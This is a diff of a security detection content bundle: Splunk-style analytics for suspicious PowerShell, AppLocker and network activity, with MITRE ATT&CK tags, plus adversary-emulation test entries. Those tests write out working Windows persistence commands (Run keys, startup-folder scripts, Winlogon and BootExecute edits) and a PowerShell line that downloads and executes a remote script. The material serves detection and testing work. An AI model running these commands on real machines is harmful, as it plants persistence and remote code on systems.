Anomaly detection can be a good indicator that a powershell process to decrypt code. We recommend to further check the parent_process_name, the file or data it tries to decrypt, network connection and user who execute the script.", - "search": "`powershell` EventCode=4104 ScriptBlockText = \"*System.Security.Cryptography*\" AND NOT(ScriptBlockText IN (\"*SHA*\", \"*MD5*\", \"*DeriveBytes*\")) | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powershell_cryptography_namespace_filter`", + "name": "Windows Powershell Cryptography Namespace", + "description": "The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that is processing cryptography namespace library. This technique was seen in several powershell malware, loader, downloader and stager that will decrypt or decode the next malicious stager or the actual payload. This Anomaly detection can be a good indicator that a powershell process to decrypt code. We recommend to further check the parent_process_name, the file or data it tries to decrypt, network connection and user who execute the script.", + "search": "`powershell` EventCode=4104 ScriptBlockText = \"*System.Security.Cryptography*\" AND NOT(ScriptBlockText IN (\"*SHA*\", \"*MD5*\", \"*DeriveBytes*\")) | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powershell_cryptography_namespace_filter`", + "tags": { + "name": "Windows Powershell Cryptography Namespace", + "analytic_story": [ + "AsyncRAT" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Installation" + ], + "message": "A suspicious powershell script contains cryptography command in $ScriptBlockText$ with EventCode $EventCode$ in host $Computer$", + "mitre_attack_id": [ + "T1059.001", + "T1059" + ], + "nist": [ + "DE.AE" + ], + "observable": [ + { + "name": "Computer", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "User", + "type": "User", + "role": [ + "Victim" + ] + } + ], + "risk_score": 25, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1059.001", + "mitre_attack_technique": "PowerShell", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT28", + "APT29", + "APT3", + "APT32", + "APT33", + "APT38", + "APT39", + "APT41", + "Aquatic Panda", + "BRONZE BUTLER", + "Blue Mockingbird", + "Chimera", + "Cobalt Group", + "Confucius", + "CopyKittens", + "DarkHydrus", + "DarkVishnya", + "Deep Panda", + "Dragonfly", + "Earth Lusca", + "Ember Bear", + "FIN10", + "FIN6", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "GOLD SOUTHFIELD", + "Gallmaker", + "Gamaredon Group", + "Gorgon Group", + "HAFNIUM", + "HEXANE", + "Inception", + "Indrik Spider", + "Kimsuky", + "Lazarus Group", + "LazyScripter", + "Leviathan", + "Magic Hound", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Nomadic Octopus", + "OilRig", + "Patchwork", + "Poseidon Group", + "Sandworm Team", + "Sidewinder", + "Silence", + "Stealth Falcon", + "TA459", + "TA505", + "TEMP.Veles", + "TeamTNT", + "Threat Group-3390", + "Thrip", + "Tonto Team", + "Turla", + "WIRTE", + "Wizard Spider", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1059", + "mitre_attack_technique": "Command and Scripting Interpreter", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT32", + "APT37", + "APT39", + "Dragonfly", + "FIN5", + "FIN6", + "FIN7", + "Fox Kitten", + "Ke3chang", + "OilRig", + "Stealth Falcon", + "Whitefly", + "Windigo" + ] + } + ] + } + }, + { + "name": "Windows PowerShell Get CIMInstance Remote Computer", + "description": "This analytic identifies the use of Get-CimInstance cmdlet with the -ComputerName parameter, which indicates that the cmdlet is being used to retrieve information from a remote computer. This can be useful for detecting instances of remote access, such as when an attacker uses PowerShell to connect to a remote system and gather information. By monitoring for this cmdlet with the -ComputerName parameter, security analysts can identify potential malicious activity on remote systems and take appropriate action to mitigate any threats.", + "search": "`powershell` EventCode=4104 ScriptBlockText=\"*get-ciminstance*\" AND ScriptBlockText=\"*computername*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powershell_get_ciminstance_remote_computer_filter`", "tags": { - "name": "Windows Powershell Cryptography Namespace", + "name": "Windows PowerShell Get CIMInstance Remote Computer", "analytic_story": [ - "AsyncRAT" + "Active Directory Lateral Movement" ], "asset_type": "Endpoint", "cis20": [ @@ -462478,10 +468054,9 @@ "kill_chain_phases": [ "Installation" ], - "message": "A suspicious powershell script contains cryptography command in $ScriptBlockText$ with EventCode $EventCode$ in host $Computer$", + "message": "A PowerShell Cmdlet Get-CIMInstnace was ran on $Computer$, attempting to connect to a remote host.", "mitre_attack_id": [ - "T1059.001", - "T1059" + "T1059.001" ], "nist": [ "DE.AE" @@ -462493,16 +468068,9 @@ "role": [ "Victim" ] - }, - { - "name": "User", - "type": "User", - "role": [ - "Victim" - ] } ], - "risk_score": 25, + "risk_score": 15, "security_domain": "endpoint", "risk_severity": "low", "mitre_attack_enrichments": [ @@ -462577,66 +468145,54 @@ "Wizard Spider", "menuPass" ] - }, - { - "mitre_attack_id": "T1059", - "mitre_attack_technique": "Command and Scripting Interpreter", - "mitre_attack_tactics": [ - "Execution" - ], - "mitre_attack_groups": [ - "APT19", - "APT32", - "APT37", - "APT39", - "Dragonfly", - "FIN5", - "FIN6", - "FIN7", - "Fox Kitten", - "Ke3chang", - "OilRig", - "Stealth Falcon", - "Whitefly", - "Windigo" - ] } ] } }, { - "name": "Windows PowerShell Get CIMInstance Remote Computer", - "description": "This analytic identifies the use of Get-CimInstance cmdlet with the -ComputerName parameter, which indicates that the cmdlet is being used to retrieve information from a remote computer. This can be useful for detecting instances of remote access, such as when an attacker uses PowerShell to connect to a remote system and gather information. By monitoring for this cmdlet with the -ComputerName parameter, security analysts can identify potential malicious activity on remote systems and take appropriate action to mitigate any threats.", - "search": "`powershell` EventCode=4104 ScriptBlockText=\"*get-ciminstance*\" AND ScriptBlockText=\"*computername*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powershell_get_ciminstance_remote_computer_filter`", + "name": "Windows Powershell Import Applocker Policy", + "description": "The following analytic is to identify the imports of Windows PowerShell Applocker commandlets. This technique was seen in Azorult malware where it drops an xml Applocker policy that will deny several AV product and then loaded using PowerShell Applocker commandlet.", + "search": "`powershell` EventCode=4104 ScriptBlockText=\"*Import-Module Applocker*\" ScriptBlockText=\"*Set-AppLockerPolicy *\" ScriptBlockText=\"* -XMLPolicy *\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powershell_import_applocker_policy_filter`", "tags": { - "name": "Windows PowerShell Get CIMInstance Remote Computer", + "name": "Windows Powershell Import Applocker Policy", "analytic_story": [ - "Active Directory Lateral Movement" + "Azorult" ], "asset_type": "Endpoint", "cis20": [ "CIS 10" ], "kill_chain_phases": [ - "Installation" + "Installation", + "Exploitation" ], - "message": "A PowerShell Cmdlet Get-CIMInstnace was ran on $Computer$, attempting to connect to a remote host.", + "message": "A PowerShell script contains Import Applocker Policy command $ScriptBlockText$ with EventCode $EventCode$ on host $dest$", "mitre_attack_id": [ - "T1059.001" + "T1059.001", + "T1059", + "T1562.001", + "T1562" ], "nist": [ - "DE.AE" + "DE.CM" ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" ] + }, + { + "name": "user", + "type": "User", + "role": [ + "Victim" + ] } ], - "risk_score": 15, + "risk_score": 49, "security_domain": "endpoint", "risk_severity": "low", "mitre_attack_enrichments": [ @@ -462711,54 +468267,111 @@ "Wizard Spider", "menuPass" ] + }, + { + "mitre_attack_id": "T1059", + "mitre_attack_technique": "Command and Scripting Interpreter", + "mitre_attack_tactics": [ + "Execution" + ], + "mitre_attack_groups": [ + "APT19", + "APT32", + "APT37", + "APT39", + "Dragonfly", + "FIN5", + "FIN6", + "FIN7", + "Fox Kitten", + "Ke3chang", + "OilRig", + "Stealth Falcon", + "Whitefly", + "Windigo" + ] + }, + { + "mitre_attack_id": "T1562.001", + "mitre_attack_technique": "Disable or Modify Tools", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [ + "APT29", + "Aquatic Panda", + "BRONZE BUTLER", + "Ember Bear", + "FIN6", + "Gamaredon Group", + "Gorgon Group", + "Indrik Spider", + "Kimsuky", + "Lazarus Group", + "Magic Hound", + "MuddyWater", + "Putter Panda", + "Rocke", + "TA505", + "TeamTNT", + "Turla", + "Wizard Spider" + ] + }, + { + "mitre_attack_id": "T1562", + "mitre_attack_technique": "Impair Defenses", + "mitre_attack_tactics": [ + "Defense Evasion" + ], + "mitre_attack_groups": [ + "Magic Hound" + ] } ] } }, { - "name": "Windows Powershell Import Applocker Policy", - "description": "The following analytic is to identify the imports of Windows PowerShell Applocker commandlets. This technique was seen in Azorult malware where it drops an xml Applocker policy that will deny several AV product and then loaded using PowerShell Applocker commandlet.", - "search": "`powershell` EventCode=4104 ScriptBlockText=\"*Import-Module Applocker*\" ScriptBlockText=\"*Set-AppLockerPolicy *\" ScriptBlockText=\"* -XMLPolicy *\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powershell_import_applocker_policy_filter`", + "name": "Windows Powershell RemoteSigned File", + "description": "This analytic identifies the use of \"remotesigned\" execution policy for a file. This security setting determines whether PowerShell scripts can be executed on a computer. When the execution policy is set to \"remotesigned,\" it allows locally created scripts to run without any restrictions, but scripts downloaded from the internet must have a digital signature from a trusted publisher.", + "search": "| tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` Processes.process=\"* remotesigned *\" Processes.process=\"* -File *\" by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powershell_remotesigned_file_filter`", "tags": { - "name": "Windows Powershell Import Applocker Policy", + "name": "Windows Powershell RemoteSigned File", "analytic_story": [ - "Azorult" + "Amadey" ], "asset_type": "Endpoint", "cis20": [ "CIS 10" ], "kill_chain_phases": [ - "Installation", - "Exploitation" + "Installation" ], - "message": "A PowerShell script contains Import Applocker Policy command $ScriptBlockText$ with EventCode $EventCode$ in host $Computer$", + "message": "A PowerShell commandline with remotesigned policy executed on $dest$", "mitre_attack_id": [ "T1059.001", - "T1059", - "T1562.001", - "T1562" + "T1059" ], "nist": [ - "DE.CM" + "DE.AE" ], "observable": [ { - "name": "Computer", + "name": "dest", "type": "Hostname", "role": [ "Victim" ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" ] } ], - "risk_score": 49, + "risk_score": 25, "security_domain": "endpoint", "risk_severity": "low", "mitre_attack_enrichments": [ @@ -462856,43 +468469,6 @@ "Whitefly", "Windigo" ] - }, - { - "mitre_attack_id": "T1562.001", - "mitre_attack_technique": "Disable or Modify Tools", - "mitre_attack_tactics": [ - "Defense Evasion" - ], - "mitre_attack_groups": [ - "APT29", - "Aquatic Panda", - "BRONZE BUTLER", - "Ember Bear", - "FIN6", - "Gamaredon Group", - "Gorgon Group", - "Indrik Spider", - "Kimsuky", - "Lazarus Group", - "Magic Hound", - "MuddyWater", - "Putter Panda", - "Rocke", - "TA505", - "TeamTNT", - "Turla", - "Wizard Spider" - ] - }, - { - "mitre_attack_id": "T1562", - "mitre_attack_technique": "Impair Defenses", - "mitre_attack_tactics": [ - "Defense Evasion" - ], - "mitre_attack_groups": [ - "Magic Hound" - ] } ] } @@ -463100,7 +468676,7 @@ { "name": "Windows PowerShell WMI Win32 ScheduledJob", "description": "The following analytic detects the use of the PowerShell script block logging mechanism to detect the use of the Win32_ScheduledJob WMI class. This class allows the creation and management of scheduled tasks on Windows systems. However, due to security concerns, the class has been disabled by default in Windows systems, and its use must be explicitly enabled by modifying the registry. As a result, the detection of the use of this class may indicate malicious activity, especially if the class was enabled on the system by the attacker. Therefore, it is recommended to monitor the use of Win32_ScheduledJob through PowerShell script block logging and to investigate any suspicious activity.", - "search": "`powershell` EventCode=4104 ScriptBlockText=\"*win32_scheduledjob*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powershell_wmi_win32_scheduledjob_filter`", + "search": "`powershell` EventCode=4104 ScriptBlockText=\"*win32_scheduledjob*\" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer UserID | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_powershell_wmi_win32_scheduledjob_filter`", "tags": { "name": "Windows PowerShell WMI Win32 ScheduledJob", "analytic_story": [ @@ -468647,8 +474223,8 @@ }, { "name": "Wermgr Process Connecting To IP Check Web Services", - "description": "this search is designed to detect suspicious wermgr.exe process that tries to connect to known IP web services. This technique is know for trickbot and other trojan spy malware to recon the infected machine and look for its ip address without so much finger print on the commandline process. Since wermgr.exe is designed for error handling process of windows it is really suspicious that this process is trying to connect to this IP web services cause that maybe cause of some malicious code injection.", - "search": "`sysmon` EventCode =22 process_name = wermgr.exe QueryName IN (\"*wtfismyip.com\", \"*checkip.amazonaws.com\", \"*ipecho.net\", \"*ipinfo.io\", \"*api.ipify.org\", \"*icanhazip.com\", \"*ip.anysrc.com\",\"*api.ip.sb\", \"ident.me\", \"www.myexternalip.com\", \"*zen.spamhaus.org\", \"*cbl.abuseat.org\", \"*b.barracudacentral.org\",\"*dnsbl-1.uceprotect.net\", \"*spam.dnsbl.sorbs.net\") | stats min(_time) as firstTime max(_time) as lastTime count by Image process_name ProcessId QueryName QueryStatus QueryResults Computer EventCode | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `wermgr_process_connecting_to_ip_check_web_services_filter`", + "description": "This search is designed to detect suspicious wermgr.exe process that tries to connect to known IP web services. This technique is know for trickbot and other trojan spy malware to recon the infected machine and look for its ip address without so much finger print on the commandline process. Since wermgr.exe is designed for error handling process of windows it is really suspicious that this process is trying to connect to this IP web services cause that maybe cause of some malicious code injection.", + "search": "`sysmon` EventCode =22 process_name = wermgr.exe QueryName IN (\"*wtfismyip.com\", \"*checkip.amazonaws.com\", \"*ipecho.net\", \"*ipinfo.io\", \"*api.ipify.org\", \"*icanhazip.com\", \"*ip.anysrc.com\",\"*api.ip.sb\", \"ident.me\", \"www.myexternalip.com\", \"*zen.spamhaus.org\", \"*cbl.abuseat.org\", \"*b.barracudacentral.org\",\"*dnsbl-1.uceprotect.net\", \"*spam.dnsbl.sorbs.net\") | stats min(_time) as firstTime max(_time) as lastTime count by Image process_name ProcessId QueryName QueryStatus QueryResults Computer EventCode | rename Computer as dest| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `wermgr_process_connecting_to_ip_check_web_services_filter`", "tags": { "name": "Wermgr Process Connecting To IP Check Web Services", "analytic_story": [ @@ -468661,7 +474237,7 @@ "kill_chain_phases": [ "Reconnaissance" ], - "message": "Wermgr.exe process connecting IP location web services on $ComputerName$", + "message": "Wermgr.exe process connecting IP location web services on $dest$", "mitre_attack_id": [ "T1590", "T1590.005" @@ -468671,7 +474247,7 @@ ], "observable": [ { - "name": "ComputerName", + "name": "dest", "type": "Endpoint", "role": [ "Victim" @@ -471379,9 +476955,9 @@ "REG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Atomic Red Team\" /t REG_SZ /F /D \"C:\\Path\\AtomicRedTeam.exe\"\n", "REG ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\Path\\AtomicRedTeam.dll\"\n", "$RunOnceKey = \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"\nset-itemproperty $RunOnceKey \"NextRun\" 'powershell.exe \"IEX (New-Object Net.WebClient).DownloadString(`\"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`\")\"'\n", - "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\vbsstartup.vbs \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\vbsstartup.vbs \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\"\ncscript.exe \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\"\ncscript.exe \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\"\n", - "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\jsestartup.jse \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\jsestartup.jse \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\"\ncscript.exe /E:Jscript \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\"\ncscript.exe /E:Jscript \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\"\n", - "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\batstartup.bat \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\batstartup.bat \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\"\nStart-Process \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"\nStart-Process \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\"\n", + "Copy-Item \"$PathToAtomicsFolder\\T1547.001\\src\\vbsstartup.vbs\" \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\"\nCopy-Item \"$PathToAtomicsFolder\\T1547.001\\src\\vbsstartup.vbs\" \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\"\ncscript.exe \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\"\ncscript.exe \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\"\n", + "Copy-Item \"$PathToAtomicsFolder\\T1547.001\\src\\jsestartup.jse\" \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\"\nCopy-Item \"$PathToAtomicsFolder\\T1547.001\\src\\jsestartup.jse\" \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\"\ncscript.exe /E:Jscript \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\"\ncscript.exe /E:Jscript \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\"\n", + "Copy-Item \"$PathToAtomicsFolder\\T1547.001\\src\\batstartup.bat\" \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"\nCopy-Item \"$PathToAtomicsFolder\\T1547.001\\src\\batstartup.bat\" \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\"\nStart-Process \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"\nStart-Process \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\"\n", "$Target = \"C:\\Windows\\System32\\calc.exe\"\n$ShortcutLocation = \"$home\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\calc_exe.lnk\"\n$WScriptShell = New-Object -ComObject WScript.Shell\n$Create = $WScriptShell.CreateShortcut($ShortcutLocation)\n$Create.TargetPath = $Target\n$Create.Save() ", "reg ADD \"HKCR\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open\\command\" /ve /d \"calc.exe\" /f", "$RunKey = \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\nSet-ItemProperty -Path $RunKey -Name \"socks5_powershell\" -Value \"powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File\"\n", @@ -471391,7 +476967,7 @@ "if (!(Test-Path -Path \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\")){\n New-Item -ItemType Key -Path \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\"\n}\nSet-ItemProperty -Path \"HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\" -Name \"atomictest\" -Value \"C:\\Windows\\System32\\calc.exe\"\n", "$oldvalue = $(Get-ItemPropertyValue -Path \"HKLM:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" -Name \"Userinit\");\nSet-ItemProperty -Path \"HKLM:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" -Name \"Userinit-backup\" -Value \"$oldvalue\";\n$newvalue = $oldvalue + \" C:\\Windows\\System32\\calc.exe\";\nSet-ItemProperty -Path \"HKLM:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" -Name \"Userinit\" -Value \"$newvalue\"\n", "$oldvalue = $(Get-ItemPropertyValue -Path \"HKLM:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" -Name \"Shell\");\nSet-ItemProperty -Path \"HKLM:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" -Name \"Shell-backup\" -Value \"$oldvalue\";\n$newvalue = $oldvalue + \", C:\\Windows\\explorer.exe\";\nSet-ItemProperty -Path \"HKLM:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" -Name \"Shell\" -Value \"$newvalue\"\n", - "secedit /import /db mytemplate.db /cfg \\T1547.001\\src\\regtemplate.ini\nsecedit /configure /db mytemplate.db\n", + "secedit /import /db mytemplate.db /cfg \"\\T1547.001\\src\\regtemplate.ini\"\nsecedit /configure /db mytemplate.db\n", "if (!(Test-Path \"\\T1547.001\\src\\SessionManagerBackup.reg\")) { reg.exe export \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" \"\\T1547.001\\src\\SessionManagerBackup.reg\" /y }\nSet-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\" -Name \"BootExecute\" -Value \"autocheck autoche *\" -Type MultiString\n" ], "commands": [], @@ -471479,7 +477055,7 @@ "windows" ], "executor": { - "command": "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\vbsstartup.vbs \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\vbsstartup.vbs \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\"\ncscript.exe \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\"\ncscript.exe \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\"\n", + "command": "Copy-Item \"$PathToAtomicsFolder\\T1547.001\\src\\vbsstartup.vbs\" \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\"\nCopy-Item \"$PathToAtomicsFolder\\T1547.001\\src\\vbsstartup.vbs\" \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\"\ncscript.exe \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\"\ncscript.exe \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\"\n", "cleanup_command": "Remove-Item \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\vbsstartup.vbs\" -ErrorAction Ignore\nRemove-Item \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\vbsstartup.vbs\" -ErrorAction Ignore\n", "name": "powershell", "elevation_required": true @@ -471493,7 +477069,7 @@ "windows" ], "executor": { - "command": "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\jsestartup.jse \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\jsestartup.jse \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\"\ncscript.exe /E:Jscript \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\"\ncscript.exe /E:Jscript \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\"\n", + "command": "Copy-Item \"$PathToAtomicsFolder\\T1547.001\\src\\jsestartup.jse\" \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\"\nCopy-Item \"$PathToAtomicsFolder\\T1547.001\\src\\jsestartup.jse\" \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\"\ncscript.exe /E:Jscript \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\"\ncscript.exe /E:Jscript \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\"\n", "cleanup_command": "Remove-Item \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jsestartup.jse\" -ErrorAction Ignore\nRemove-Item \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\jsestartup.jse\" -ErrorAction Ignore\n", "name": "powershell", "elevation_required": true @@ -471507,7 +477083,7 @@ "windows" ], "executor": { - "command": "Copy-Item $PathToAtomicsFolder\\T1547.001\\src\\batstartup.bat \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"\nCopy-Item $PathToAtomicsFolder\\T1547.001\\src\\batstartup.bat \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\"\nStart-Process \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"\nStart-Process \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\"\n", + "command": "Copy-Item \"$PathToAtomicsFolder\\T1547.001\\src\\batstartup.bat\" \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"\nCopy-Item \"$PathToAtomicsFolder\\T1547.001\\src\\batstartup.bat\" \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\"\nStart-Process \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\"\nStart-Process \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\"\n", "cleanup_command": "Remove-Item \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\batstartup.bat\" -ErrorAction Ignore\nRemove-Item \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\batstartup.bat\" -ErrorAction Ignore\n", "name": "powershell", "elevation_required": true @@ -471730,7 +477306,7 @@ } }, "executor": { - "command": "secedit /import /db #{secedit_db} /cfg #{ini_file}\nsecedit /configure /db #{secedit_db}\n", + "command": "secedit /import /db #{secedit_db} /cfg \"#{ini_file}\"\nsecedit /configure /db #{secedit_db}\n", "cleanup_command": "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"calc\" /f >nul 2>&1", "name": "command_prompt", "elevation_required": true @@ -472238,7 +477814,8 @@ "AsyncRAT", "Amadey", "Sneaky Active Directory Persistence Tricks", - "BlackByte Ransomware" + "BlackByte Ransomware", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -473681,7 +479258,7 @@ { "name": "Azure AD External Guest User Invited", "description": "The following analytic identifies the invitation of an external guest user within Azure AD. With Azure AD B2B collaboration, users and administrators can invite external users to collaborate with internal users. External guest account invitations should be monitored by security teams as they could potentially lead to unauthorized access. An example of this attack vector was described at BlackHat 2022 by security researcher Dirk-Jan during his tall `Backdooring and Hijacking Azure AD Accounts by Abusing External Identities`", - "search": "`azuread` \"body.operationName\"=\"Invite external user\" | rename body.properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.type as type | stats values(userPrincipalName) by _time, type, initiatedBy, result, body.operationName | `azure_ad_external_guest_user_invited_filter`", + "search": "`azuread` \"operationName\"=\"Invite external user\" | rename properties.* as * | rename targetResources{}.userPrincipalName as userPrincipalName | 